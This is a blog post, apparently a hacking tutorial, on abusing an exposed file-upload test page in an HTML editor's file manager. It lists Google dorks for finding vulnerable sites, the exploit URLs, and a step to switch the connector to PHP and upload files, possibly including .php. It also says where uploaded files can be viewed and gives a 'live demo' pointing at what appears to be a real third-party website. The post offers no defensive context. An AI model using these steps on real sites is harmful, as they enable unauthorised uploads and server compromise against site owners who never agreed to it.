Breaking News
recent
Uncategories Html editor File Upload vulnerability

Html editor File Upload vulnerability

11:26:00 AM

Html editor File Upload vulnerability


Section: 
Google Dork : inurl:/HTMLEditor/editor/ 
or "inurl:/HTMLEditor/editor//filemanager/"
or "inurl:/HTMLEditor/editor//filemanager//connectors/"


Exploit : http://website/HTMLEditor/editor/filemanager/connectors/uploadtest.html
or http://website/path/HTMLEditor/editor/filemanager/connectors/uploadtest.html



Go here : 

http://website/HTMLEditor/editor/filemanager/connectors/uploadtest.html
or http://website/path/HTMLEditor/editor/filemanager/connectors/uploadtest.html
 chnage connectors into PhP (Like FCKeditor) and upload Your file


suppoted files : .TXT and .JPG in some site you can upload .html and .php too


to view you file goto : http://website/PowerCMS%20folder/files/your file here
or http://website/patch//PowerCMS%20folder/files/your file here 


Live Demo : http://www.madhouse1.com/clients/dna/cms/HTMLEditor/editor/filemanager/connectors/uploadtest.html
http://www.madhouse1.com/PowerCMS%20folder/files/aaaaaaaa.txt
Nadim Zobaer

Nadim Zobaer

No comments:

Post a Comment

Thanks for ur comments

Subscribe to: Post Comments (Atom)
Powered by Blogger.